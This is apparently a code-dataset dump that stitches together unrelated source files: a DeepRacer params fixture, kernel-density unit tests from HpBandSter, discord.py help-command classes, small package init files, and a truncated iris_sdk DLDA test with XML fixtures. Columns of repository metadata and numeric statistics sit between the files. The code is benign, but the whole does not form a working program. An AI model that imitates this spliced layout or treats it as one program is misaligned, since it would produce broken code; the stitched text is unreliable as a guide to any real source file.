{'is_left_of_center': True, 'projection_distance': 1.1450366160526708, 'waypoints': [(2.973129727863096, 0.9587203451227853), (3.1686550001583385, 0.957973927514008), (3.3641587621388993, 0.957502662680531), (3.5596536099349976, 0.9571676056167091), (3.7551399311198708, 0.9569079073242543), (3.9506256709448877, 0.9566988842326032), (4.146107922610766, 0.9565304352142532), (4.341591530782978, 0.9563990236634121), (4.537073588662238, 0.9563010645276331), (4.732557196834449, 0.9562337963475989), (4.92803925471371, 0.9561973644632735), (5.123521506379589, 0.9561847441097273), (5.3190037580454685, 0.9562067146676283), (5.514486009711348, 0.9562466104877638), (5.709974462549027, 0.9563314648034498), (5.905463109173326, 0.9564632639275283), (6.10095815075604, 0.9566372843111675), (6.296465594682358, 0.956848729735553), (6.491997261936018, 0.9569796325965199), (6.6875785385640825, 0.9567336689306691), (6.883257677434614, 0.9557806263396478), (7.079130990497134, 0.9538671530427651), (7.275221344572657, 0.9543163504250318), (7.4705043835944585, 0.968040367211689), (7.662157411673801, 1.00506531126039), (7.845235769446617, 1.0715002572806311), (8.014446369208315, 1.1684281333446516), (8.165421648145468, 1.2924605804235763), (8.294117279524725, 1.4398041043387009), (8.397584218581926, 1.6056121986483556), (8.469351930116943, 1.7860276860462465), (8.511767170082862, 1.9763842816461406), (8.530750119682551, 2.1709724987464085), (8.535956778555175, 2.3671952090825386), (8.538760870928513, 2.563413656113056), (8.537808603483967, 2.75963888567523), (8.532572489045293, 2.95569387369283), (8.51481039514374, 3.15055503924561), (8.475491090199, 3.341414414227855), (8.407975057079398, 3.5247578720951225), (8.31106120632191, 3.693881267878382), (8.186502531679764, 3.844170542185153), (8.037129092933212, 3.969503006795976), (7.868136309330993, 4.066595722602571), (7.6851610460393545, 4.1345014606124835), (7.494133948738579, 4.175703983918254), (7.299554742716083, 4.195335731117524), (7.103587636930088, 4.201242347257079), (6.907607353654015, 4.201247579495785), (6.711783262392657, 4.199924210676329), (6.516154120469764, 4.199300605337186), (6.3205893157042965, 4.199124065727503), (6.125061330396392, 4.199215533011554), (5.929553692683456, 4.199390716114905), (5.734056325661314, 4.199555822314082), (5.538567872823634, 4.1996779078838955), (5.343080582705667, 4.199756585251109), (5.147595618027125, 4.199802318893134), (4.952113560147865, 4.199816465316303), (4.756630145762273, 4.199800962386803), (4.561147894096393, 4.19975794175744), (4.365664285924183, 4.199686628281739), (4.170183390764635, 4.199580045641426), (3.974701139098755, 4.1994405192759245), (3.779218887432876, 4.199264948599335), (3.5837366357669964, 4.199009925409058), (3.3881109820032407, 4.198595803404785), (3.3881109820032407, 4.198595803404785), (3.1927025630391057, 4.198236329227001), (2.997255774324458, 4.197737328683715), (2.801790188307791, 4.197125156755078), (2.6062952436183835, 4.195692686069265), (2.410804949807826, 4.190964292571721), (2.2150827903079318, 4.183555248776983), (2.0190451461927097, 4.16967140647651), (1.8255455254232797, 4.1381578265350925), (1.6399065197169342, 4.077816355401538), (1.4684209619443997, 3.98580995697732), (1.316564535251782, 3.863567226215878), (1.18828627180266, 3.716441712246848), (1.087181058714844, 3.5495077176822467), (1.0159622477774413, 3.3684589840609287), (0.9734102913519926, 3.178145699770326), (0.9534938958331036, 2.9834065228940503), (0.9444216541596013, 2.7872029974331767), (0.9405074066940884, 2.5907339843046135), (0.9396984929007637, 2.3942255355991335), (0.9471365077950047, 2.1980486557983383), (0.9667406161777752, 2.003330698556816), (1.008643508547042, 1.8129062776403588), (1.0777365771700467, 1.6310002804643384), (1.1746683531897695, 1.460860280079107), (1.2993533282606862, 1.3105290994160301), (1.4485447529255744, 1.1851194108376364), (1.618276541798405, 1.0898755162672418), (1.80267831683733, 1.026955253927975), (1.9950098887622332, 0.9923725057420933), (2.190220548481932, 0.9752908935522877), (2.3860145059240736, 0.9666594679897911), (2.581804490740531, 0.9621571992530031), (2.77751667022956, 0.9599051322865064), (2.973129727863096, 0.9587203451227853)], 'speed': 2.0, 'x': 4.118181848735966, 'is_crashed': False, 'is_reversed': False, 'objects_heading': [], 'y': 0.9775953652797049, 'all_wheels_on_track': True, 'distance_from_center': 0.02104085807541295, 'objects_distance_from_center': [], 'objects_distance': [], 'closest_objects': [0, 0], 'track_width': 0.6095984166466617, 'object_in_camera': False, 'heading': 0.816198971909553, 'objects_speed': [], 'progress': 5.857024652819286, 'is_offtrack': False, 'objects_left_of_center': [], 'objects_location': [], 'closest_waypoints': [5, 6], 'track_length': 19.549800178858835, 'steering_angle': 20.0, 'steps': 17.0}
]
for step in params:
print(step)
print(reward_function(step))
# print(reward_function(params[0]))
if __name__ == '__main__':
main()
| 276.122857
| 4,891
| 0.774572
| 9,944
| 96,643
| 7.454344
| 0.055511
| 0.010199
| 0.015298
| 0.015136
| 0.894949
| 0.886477
| 0.87327
| 0.867523
| 0.864919
| 0.843658
| 0
| 0.668187
| 0.076477
| 96,643
| 350
| 4,892
| 276.122857
| 0.162338
| 0.025041
| 0
| 0.201581
| 0
| 0
| 0.071841
| 0.009719
| 0
| 0
| 0
| 0
| 0
| 1
| 0.059289
| false
| 0
| 0.003953
| 0.003953
| 0.181818
| 0.071146
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
4afdb769365aa89eb2ecdc3f93c366ba4299ae7f
| 83
|
py
|
Python
|
RegscorePy/__init__.py
|
UBC-MDS/model-comparison-package
|
bcb898fe574e72d5b098d2695040f1615e05946c
|
[
"MIT"
] | 19
|
2018-03-03T20:48:19.000Z
|
2022-01-17T01:21:24.000Z
|
RegscorePy/__init__.py
|
UBC-MDS/model-comparison-package
|
bcb898fe574e72d5b098d2695040f1615e05946c
|
[
"MIT"
] | 17
|
2018-02-15T22:49:58.000Z
|
2018-03-22T03:38:58.000Z
|
RegscorePy/__init__.py
|
UBC-MDS/model-comparison-package
|
bcb898fe574e72d5b098d2695040f1615e05946c
|
[
"MIT"
] | 3
|
2018-03-01T22:07:13.000Z
|
2020-03-09T13:13:25.000Z
|
from RegscorePy import aic
from RegscorePy import bic
from RegscorePy import mallow
| 27.666667
| 29
| 0.86747
| 12
| 83
| 6
| 0.5
| 0.583333
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.13253
| 83
| 3
| 29
| 27.666667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
ab2f0fb91b21289228b87b2aa0e3f586c1bab2df
| 90
|
py
|
Python
|
tests/c_module_test.py
|
asottile/setuptools-golang-examples
|
8bdfe883c8a72742158fe07059d1fe429fb8d4e0
|
[
"MIT"
] | 11
|
2016-03-13T03:16:12.000Z
|
2021-08-14T01:53:24.000Z
|
tests/c_module_test.py
|
asottile/setuptools-golang-examples
|
8bdfe883c8a72742158fe07059d1fe429fb8d4e0
|
[
"MIT"
] | 3
|
2017-02-12T12:54:52.000Z
|
2019-09-09T20:55:05.000Z
|
tests/c_module_test.py
|
asottile/setuptools-golang-examples
|
8bdfe883c8a72742158fe07059d1fe429fb8d4e0
|
[
"MIT"
] | 1
|
2016-12-17T13:35:14.000Z
|
2016-12-17T13:35:14.000Z
|
import c_module
def test_c_module():
assert c_module.hello_world() == 'hello world'
| 15
| 50
| 0.722222
| 14
| 90
| 4.285714
| 0.571429
| 0.35
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 90
| 5
| 51
| 18
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0.122222
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
ab2f5b8d4792fbc59b89398f16ebdca527e22027
| 11,783
|
py
|
Python
|
tests/test_kernels.py
|
RevanMacQueen/HpBandSter
|
3b6a5594df30796f43114f7e0e70c1dc56c11e60
|
[
"BSD-3-Clause"
] | 546
|
2018-01-18T08:09:02.000Z
|
2022-03-25T03:06:24.000Z
|
tests/test_kernels.py
|
RevanMacQueen/HpBandSter
|
3b6a5594df30796f43114f7e0e70c1dc56c11e60
|
[
"BSD-3-Clause"
] | 99
|
2018-02-09T14:00:13.000Z
|
2022-01-11T17:05:44.000Z
|
tests/test_kernels.py
|
RevanMacQueen/HpBandSter
|
3b6a5594df30796f43114f7e0e70c1dc56c11e60
|
[
"BSD-3-Clause"
] | 126
|
2018-02-12T14:08:58.000Z
|
2022-03-08T02:50:33.000Z
|
import os
import unittest
import numpy as np
#from scipy.integrate import quadrature as quadrature
from scipy.integrate import quad as quadrature
from statsmodels.nonparametric import kernels as sm_kernels
from hpbandster.optimizers.kde import kernels as hp_kernels
import ConfigSpace as CS
from pdb import set_trace
rapid_development=True
rapid_development=False
class TestGaussian(unittest.TestCase):
n_train = 256
n_test = 1024
def setUp(self):
self.x_train = np.random.rand(self.n_train)
self.x_test = np.random.rand(self.n_test)
def tearDown(self):
self.x_train = None
self.x_test = None
@unittest.skipIf(rapid_development, "test skipped to accelerate developing new tests")
def test_values(self):
for bw in [1e-3, 1e-2, 1e-1, 1]:
sm_values = sm_kernels.gaussian(bw, self.x_train[:,None], self.x_test[None,:])
hp_kernel = hp_kernels.Gaussian(data=self.x_train, bandwidth=bw, fix_boundary=False)
hp_values = hp_kernel(self.x_test)
self.assertTrue(np.allclose(hp_values, sm_values/bw, 1e-4))
@unittest.skipIf(rapid_development, "test skipped to accelerate developing new tests")
def test_pdf_boundary_simple(self):
self.x_train = np.array([0])
for bw in [1e-3, 1e-2, 1e-1]:
# note: for larger bandwidths, the pdf also needs to be truncated as +1,
# which leads to something different than twice the pdf
hp_kernel1 = hp_kernels.Gaussian(data=self.x_train, bandwidth=bw, fix_boundary=False)
hp_kernel2 = hp_kernels.Gaussian(data=self.x_train, bandwidth=bw, fix_boundary=True)
hp_values1 = hp_kernel1(self.x_test)
hp_values2 = hp_kernel2(self.x_test)
self.assertTrue(np.allclose(2*hp_values1, hp_values2, 1e-4))
self.x_train = np.array([1])
for bw in [1e-3, 1e-2, 1e-1]:
# note: for larger bandwidths, the pdf also needs to be truncated as +1,
# which leads to something different than twice the pdf
hp_kernel1 = hp_kernels.Gaussian(data=self.x_train, bandwidth=bw, fix_boundary=False)
hp_kernel2 = hp_kernels.Gaussian(data=self.x_train, bandwidth=bw, fix_boundary=True)
hp_values1 = hp_kernel1(self.x_test)
hp_values2 = hp_kernel2(self.x_test)
self.assertTrue(np.allclose(2*hp_values1, hp_values2, 1e-4))
# simple test based on 68, 95, 99% rule
self.x_train = np.array([0.5])
for bw, w in ([0.5, 0.6827], [0.25, 0.9545], [1/6, 0.9973]):
hp_kernel = hp_kernels.Gaussian(data=self.x_train, bandwidth=bw, fix_boundary=True)
self.assertAlmostEqual(hp_kernel.weights[0], 1/w, delta=1e-4)
@unittest.skipIf(rapid_development, "test skipped to accelerate developing new tests")
def test_pdf_boundary_quadrature(self):
for bw in [1e-2, 1e-1, 1]:
hp_kernel = hp_kernels.Gaussian(data=self.x_train, bandwidth=bw, fix_boundary=True)
def quad_me(x):
x_test = np.array([x])
pdfs = hp_kernel(x_test)
return(pdfs.mean())
self.assertAlmostEqual(quadrature(quad_me, 0, 1)[0], 1, delta=1e-4)
@unittest.skipIf(rapid_development, "test skipped to accelerate developing new tests")
def test_sample(self):
num_samples = 2**20
for bw in [1e-1, 5e-1, 1]:
hp_kernel = hp_kernels.Gaussian(data=self.x_train, bandwidth=bw, fix_boundary=True)
samples = hp_kernel.sample(num_samples=num_samples)
phat1, x = np.histogram(samples, normed=True)
phat2 = hp_kernel((x[1:] + x[:-1])/2).mean(axis=0)
for p1, p2 in zip(phat1, phat2):
self.assertAlmostEqual(p1, p2, delta=5e-2)
class Test1dCategorical(unittest.TestCase):
n_train = 256
n_test = 1024
def setUp(self):
self.configspace = CS.ConfigurationSpace(43)
HPs=[]
HPs.append( CS.CategoricalHyperparameter('cat1', choices=['foo', 'bar', 'baz']))
self.configspace.add_hyperparameters(HPs)
x_train_confs = [ self.configspace.sample_configuration() for i in range(self.n_train)]
self.x_train = np.array( [c.get_array() for c in x_train_confs]).squeeze()
x_test_confs = [ self.configspace.sample_configuration() for i in range(self.n_test)]
self.x_test= np.array( [c.get_array() for c in x_train_confs]).squeeze()
def tearDown(self):
self.configspace = None
self.x_train = None
self.x_test = None
@unittest.skipIf(rapid_development, "test skipped to accelerate developing new tests")
def test_values(self):
for bw in [1e-3, 1e-2, 1e-1, 1]:
sm_values = []
for x in self.x_test:
sm_values.append(sm_kernels.aitchison_aitken(bw, self.x_train, x))
sm_values = np.array(sm_values)
hp_kernel = hp_kernels.AitchisonAitken(data=self.x_train, bandwidth=bw, num_values=len(self.configspace.get_hyperparameters()[0].choices))
hp_values = hp_kernel(self.x_test)
self.assertTrue(np.allclose(hp_values.T, sm_values.squeeze(), 1e-4))
@unittest.skipIf(rapid_development, "test skipped to accelerate developing new tests")
def test_sample(self):
num_samples = 2**20
for bw in [1e-1, 5e-1, 1]:
hp_kernel = hp_kernels.AitchisonAitken(data=self.x_train, bandwidth=bw, num_values=len(self.configspace.get_hyperparameters()[0].choices))
samples = hp_kernel.sample(num_samples=num_samples)
phat1, phat2 = [], []
for value in [0,1,2]:
phat1.append(np.sum(samples==value)/num_samples)
phat2.append(hp_kernel(np.array([value])).mean(axis=0)[0])
for p1, p2 in zip(phat1, phat2):
self.assertAlmostEqual(p1, p2, delta=5e-3)
self.assertAlmostEqual(np.sum(phat2), 1 , delta=1e-5)
class Test1dInteger(unittest.TestCase):
n_train = 128
n_test = 1024
def setUp(self):
self.configspace = CS.ConfigurationSpace(43)
HPs=[]
HPs.append( CS.UniformIntegerHyperparameter('int1', lower=-2, upper=2))
self.configspace.add_hyperparameters(HPs)
x_train_confs = [ self.configspace.sample_configuration() for i in range(self.n_train)]
self.x_train = np.array([c.get_array() for c in x_train_confs]).squeeze()
x_test_confs = [ self.configspace.sample_configuration() for i in range(self.n_test)]
self.x_test= np.array( [c.get_array() for c in x_test_confs]).squeeze()
def tearDown(self):
self.configspace = None
self.x_train = None
self.x_test = None
@unittest.skipIf(rapid_development, "test skipped to accelerate developing new tests")
def test_values(self):
n = self.configspace.get_hyperparameters()[0].upper - self.configspace.get_hyperparameters()[0].lower + 1
for bw in [1e-3, 1e-2, 1e-1, 0.99]:
sm_x_train= np.rint(self.x_train* n - .5).astype(np.int)
sm_x_test = np.rint(self.x_test * n - .5).astype(np.int).squeeze()
sm_values = np.array([sm_kernels.wang_ryzin(bw, sm_x_train[:,None], x) for x in sm_x_test]).squeeze()
hp_kernel = hp_kernels.WangRyzinInteger(data=self.x_train, bandwidth=bw, num_values=n, fix_boundary=False)
hp_values = hp_kernel(self.x_test).squeeze()
self.assertTrue(np.allclose(hp_values.T, sm_values, 1e-4))
@unittest.skipIf(rapid_development, "test skipped to accelerate developing new tests")
def test_pdf_boundary_quadrature(self):
self.x_test = np.array([0,1,2,3,4])/5+(1/10)
for bw in [1e-2, 1e-1, 0.99]:
hp_kernel = hp_kernels.WangRyzinInteger(data=self.x_train, bandwidth=bw, num_values=5, fix_boundary=True)
hp_values = hp_kernel(self.x_test).mean(axis=0)
self.assertAlmostEqual(hp_values.sum(), 1, delta=1e-4)
@unittest.skipIf(rapid_development, "test skipped to accelerate developing new tests")
def test_sample(self):
num_samples = 2**20
for bw in [1e-1, 5e-1, 0.99]:
hp_kernel = hp_kernels.WangRyzinInteger(data=self.x_train, bandwidth=bw, num_values=5, fix_boundary=True)
samples = hp_kernel.sample(num_samples=num_samples)
phat1, x = np.histogram(samples, normed=True, bins=[0, 0.2, .4, .6, .8, 1.])
phat1 /= 5 # account for bin width
phat2 = hp_kernel((x[1:] + x[:-1])/2).mean(axis=0)
for p1, p2 in zip(phat1, phat2):
self.assertAlmostEqual(p1, p2, delta=5e-2)
class Test1dOrdinal(unittest.TestCase):
n_train = 128
n_test = 5
def setUp(self):
self.configspace = CS.ConfigurationSpace(43)
HPs=[]
HPs.append( CS.OrdinalHyperparameter('ord1', ['cold', 'mild', 'warm', 'hot']))
self.configspace.add_hyperparameters(HPs)
x_train_confs = [ self.configspace.sample_configuration() for i in range(self.n_train)]
self.x_train = np.array([c.get_array() for c in x_train_confs]).squeeze()
x_test_confs = [ self.configspace.sample_configuration() for i in range(self.n_test)]
self.x_test= np.array( [c.get_array() for c in x_test_confs]).squeeze()
def tearDown(self):
self.configspace = None
self.x_train = None
self.x_test = None
@unittest.skipIf(rapid_development, "test skipped to accelerate developing new tests")
def test_values(self):
for bw in [1e-3, 1e-2, 1e-1, 1]:
sm_values = np.array([sm_kernels.wang_ryzin(bw, self.x_train[:,None], x) for x in self.x_test])
hp_kernel = hp_kernels.WangRyzinOrdinal(data=self.x_train, bandwidth=bw, fix_boundary=False)
hp_values = hp_kernel(self.x_test)
self.assertTrue(np.allclose(hp_values.T, sm_values, 1e-4))
@unittest.skipIf(rapid_development, "test skipped to accelerate developing new tests")
def test_pdf_boundary_simple(self):
self.x_train = np.array([0])
self.x_test = np.array([0, 1,2,3])
for bw in [1e-3, 1e-2]:
# note: for larger bandwidths, the pdf also needs to be truncated as +1,
# which leads to something different than the scaling computed here
hp_kernel1 = hp_kernels.WangRyzinOrdinal(data=self.x_train, bandwidth=bw, num_values=4, fix_boundary=False)
hp_kernel2 = hp_kernels.WangRyzinOrdinal(data=self.x_train, bandwidth=bw, num_values=4, fix_boundary=True)
hp_values1 = hp_kernel1(self.x_test).squeeze()
hp_values2 = hp_kernel2(self.x_test).squeeze()
weight = 1-hp_values1[1:].sum()
self.assertTrue(np.allclose(hp_values1/weight, hp_values2, 1e-4))
self.x_train = np.array([3])
self.x_test = np.array([0,1,2,3])
for bw in [1e-3, 1e-2]:
# note: for larger bandwidths, the pdf also needs to be truncated as +1,
# which leads to something different than the scaling computed here
hp_kernel1 = hp_kernels.WangRyzinOrdinal(data=self.x_train, bandwidth=bw, num_values=4, fix_boundary=False)
hp_kernel2 = hp_kernels.WangRyzinOrdinal(data=self.x_train, bandwidth=bw, num_values=4, fix_boundary=True)
hp_values1 = hp_kernel1(self.x_test).squeeze()
hp_values2 = hp_kernel2(self.x_test).squeeze()
weight = 1-hp_values1[:-1].sum()
self.assertTrue(np.allclose(hp_values1/weight, hp_values2, 1e-4))
# simple test based on 68, 95, 99% rule
self.x_train = np.array([0.5])
for bw, w in ([0.5, 0.6827], [0.25, 0.9545], [1/6, 0.9973]):
hp_kernel = hp_kernels.Gaussian(data=self.x_train, bandwidth=bw, fix_boundary=True)
self.assertAlmostEqual(hp_kernel.weights[0], 1/w, delta=1e-4)
@unittest.skipIf(rapid_development, "test skipped to accelerate developing new tests")
def test_pdf_boundary_quadrature(self):
self.x_test = np.array([0,1,2,3])
for bw in [1e-2, 1e-1, 0.99]:
hp_kernel = hp_kernels.WangRyzinOrdinal(data=self.x_train, bandwidth=bw, num_values=4, fix_boundary=True)
hp_values = hp_kernel(self.x_test).mean(axis=0)
self.assertAlmostEqual(hp_values.sum(), 1, delta=1e-4)
@unittest.skipIf(rapid_development, "test skipped to accelerate developing new tests")
def test_sample(self):
num_samples = 2**20
for bw in [1e-1, 5e-1, 0.99]:
hp_kernel = hp_kernels.WangRyzinOrdinal(data=self.x_train, bandwidth=bw, num_values=4, fix_boundary=True)
samples = hp_kernel.sample(num_samples=num_samples)
phat1, x = np.histogram(samples, normed=True, bins=[-0.5, 0.5, 1.5, 2.5, 3.5])
phat2 = hp_kernel((x[1:] + x[:-1])/2).mean(axis=0)
for p1, p2 in zip(phat1, phat2):
self.assertAlmostEqual(p1, p2, delta=5e-2)
if __name__ == '__main__':
unittest.main()
| 36.033639
| 141
| 0.719426
| 1,923
| 11,783
| 4.227769
| 0.095164
| 0.042435
| 0.04797
| 0.036162
| 0.876507
| 0.855966
| 0.852645
| 0.840221
| 0.8369
| 0.819434
| 0
| 0.040553
| 0.146143
| 11,783
| 326
| 142
| 36.144172
| 0.767518
| 0.057541
| 0
| 0.714953
| 0
| 0
| 0.059046
| 0
| 0
| 0
| 0
| 0
| 0.084112
| 1
| 0.102804
| false
| 0
| 0.037383
| 0
| 0.196262
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
db5859dd6b72238df119a5bd50931cc9b6a98bc9
| 81
|
py
|
Python
|
scripts/update_front_end.py
|
mattheweller/TokenFarm
|
f2f4accc121b29f280e740cc4dbedc207fb61f33
|
[
"MIT"
] | 1
|
2021-11-20T08:29:10.000Z
|
2021-11-20T08:29:10.000Z
|
scripts/update_front_end.py
|
mattheweller/TokenFarm
|
f2f4accc121b29f280e740cc4dbedc207fb61f33
|
[
"MIT"
] | null | null | null |
scripts/update_front_end.py
|
mattheweller/TokenFarm
|
f2f4accc121b29f280e740cc4dbedc207fb61f33
|
[
"MIT"
] | 1
|
2022-02-14T03:21:27.000Z
|
2022-02-14T03:21:27.000Z
|
from scripts.deploy import update_front_end
def main():
update_front_end()
| 13.5
| 43
| 0.765432
| 12
| 81
| 4.833333
| 0.75
| 0.37931
| 0.482759
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.160494
| 81
| 5
| 44
| 16.2
| 0.852941
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
db6bfdadd7306c73645432b3d2935a0adf2ff718
| 103
|
py
|
Python
|
accepted/chennaipy/october/samplecode/minions/__init__.py
|
tasdikrahman/talks
|
bba44283e149ab27fb8cc2f6f8644adf9f2c8a11
|
[
"MIT"
] | 1
|
2017-04-16T06:59:02.000Z
|
2017-04-16T06:59:02.000Z
|
accepted/chennaipy/october/samplecode/minions/__init__.py
|
prodicus/talks
|
bba44283e149ab27fb8cc2f6f8644adf9f2c8a11
|
[
"MIT"
] | null | null | null |
accepted/chennaipy/october/samplecode/minions/__init__.py
|
prodicus/talks
|
bba44283e149ab27fb8cc2f6f8644adf9f2c8a11
|
[
"MIT"
] | 1
|
2019-10-26T00:28:07.000Z
|
2019-10-26T00:28:07.000Z
|
# minions/__init__.py
print("inside minions/__init__.py")
from .foo import Foo
from .bar import Bar
| 12.875
| 35
| 0.747573
| 16
| 103
| 4.3125
| 0.5625
| 0.318841
| 0.376812
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.145631
| 103
| 7
| 36
| 14.714286
| 0.784091
| 0.184466
| 0
| 0
| 0
| 0
| 0.320988
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0.333333
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
db91b5d0571ba472364cbad40dac989d29f41f85
| 1,511
|
py
|
Python
|
discoutils/help_cmds.py
|
Rishiraj0100/discoutils
|
67da54034bf5771d7e55627c2cdcddc9f72f19a4
|
[
"MIT"
] | 2
|
2021-04-09T03:27:43.000Z
|
2021-05-24T16:29:42.000Z
|
discoutils/help_cmds.py
|
Rishiraj0100/discoutils
|
67da54034bf5771d7e55627c2cdcddc9f72f19a4
|
[
"MIT"
] | null | null | null |
discoutils/help_cmds.py
|
Rishiraj0100/discoutils
|
67da54034bf5771d7e55627c2cdcddc9f72f19a4
|
[
"MIT"
] | 1
|
2021-03-20T14:23:28.000Z
|
2021-03-20T14:23:28.000Z
|
import discord
from discord.ext import commands
class MinimalEmbedHelp(commands.MinimalHelpCommand):
def __init__(self, **options):
self.options = options
self.embed_template = options.get("embed_template", discord.Embed) or discord.Embed
if not issubclass(self.embed_template, discord.Embed):
raise TypeError(f"Embed template must be a subclass of discord.Embed not {self.embed_template!r}")
super().__init__(**options)
async def send_pages(self):
channel = self.get_destination()
embeds = []
for page in self.paginator.pages:
e = self.embed_template(description=page)
if self.options.get("color"):
e.color=self.options.get("color")
embeds.append(e)
for embed in embeds:
await channel.send(embeds=embeds)
class DefaultEmbedHelp(commands.DefaultHelpCommand):
def __init__(self, **options):
self.options = options
self.embed_template = options.get("embed_template", discord.Embed)
if not issubclass(self.embed_template, discord.Embed):
raise TypeError(f"Embed template must be a subclass of discord.Embed not {type(self.embed_template)!r}")
super().__init__(**options)
async def send_pages(self):
channel = self.get_destination()
embeds = []
for page in self.paginator.pages:
e = self.embed_template(description=page)
if self.options.get("color"):
e.color=self.options.get("color")
embeds.append(e)
for embed in embeds:
await channel.send(embeds=embeds)
| 36.853659
| 110
| 0.704831
| 197
| 1,511
| 5.253807
| 0.238579
| 0.150725
| 0.131401
| 0.096618
| 0.863768
| 0.863768
| 0.863768
| 0.863768
| 0.863768
| 0.863768
| 0
| 0
| 0.181337
| 1,511
| 40
| 111
| 37.775
| 0.836702
| 0
| 0
| 0.777778
| 0
| 0
| 0.138981
| 0.034414
| 0
| 0
| 0
| 0
| 0
| 1
| 0.055556
| false
| 0
| 0.055556
| 0
| 0.166667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
dba1ac1cb5ca95bcd1ee105cb06a942b6ca81e2a
| 18,904
|
py
|
Python
|
tests/test_dlda.py
|
NumberAI/python-bandwidth-iris
|
0e05f79d68b244812afb97e00fd65b3f46d00aa3
|
[
"MIT"
] | 2
|
2020-04-13T13:47:59.000Z
|
2022-02-23T20:32:41.000Z
|
tests/test_dlda.py
|
bandwidthcom/python-bandwidth-iris
|
dbcb30569631395041b92917252d913166f7d3c9
|
[
"MIT"
] | 5
|
2020-09-18T20:59:24.000Z
|
2021-08-25T16:51:42.000Z
|
tests/test_dlda.py
|
bandwidthcom/python-bandwidth-iris
|
dbcb30569631395041b92917252d913166f7d3c9
|
[
"MIT"
] | 5
|
2018-12-12T14:39:50.000Z
|
2020-11-17T21:42:29.000Z
|
#!/usr/bin/env python
import os
import sys
# For coverage.
if __package__ is None:
sys.path.append(os.path.dirname(os.path.abspath(__file__)) + "/..")
from unittest import main, TestCase
import requests
import requests_mock
from iris_sdk.client import Client
from iris_sdk.models.account import Account
XML_RESPONSE_DLDA_GET = (
b"<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\" ?>"
b"<DldaOrderResponse><DldaOrder>"
b"<CustomerOrderId>5a88d16d-f8a9-45c5-a5db-137d700c6a22</CustomerOrderId>"
b"<OrderCreateDate>2014-07-10T12:38:11.833Z</OrderCreateDate>"
b"<AccountId>14</AccountId><CreatedByUser>jbm</CreatedByUser>"
b"<OrderId>ea9e90c2-77a4-4f82-ac47-e1c5bb1311f4</OrderId>"
b"<LastModifiedDate>2014-07-10T12:38:11.833Z</LastModifiedDate>"
b"<ProcessingStatus>RECEIVED</ProcessingStatus><DldaTnGroups>"
b"<DldaTnGroup><TelephoneNumbers>"
b"<TelephoneNumber>2053778335</TelephoneNumber>"
b"<TelephoneNumber>2053865784</TelephoneNumber></TelephoneNumbers>"
b"<AccountType>BUSINESS</AccountType><ListingType>LISTED</ListingType>"
b"<ListingName><FirstName>Joe</FirstName><LastName>Smith</LastName>"
b"</ListingName><ListAddress>true</ListAddress><Address>"
b"<HouseNumber>12</HouseNumber><StreetName>ELM</StreetName>"
b"<City>New York</City><StateCode>NY</StateCode><Zip>10007</Zip>"
b"<Country>United States</Country><AddressType>Dlda</AddressType>"
b"</Address></DldaTnGroup></DldaTnGroups></DldaOrder>"
b"</DldaOrderResponse>"
)
XML_RESPONSE_DLDA_HISTORY = (
b"<?xml version=\"1.0\"?> <OrderHistoryWrapper><OrderHistory>"
b"<OrderDate>2014-09-04T16:28:11.320Z</OrderDate>"
b"<Note>The DL/DA request has been received</Note>"
b"<Author>jbm</Author><Status>RECEIVED</Status></OrderHistory>"
b"<OrderHistory><OrderDate>2014-09-04T16:28:18.742Z</OrderDate>"
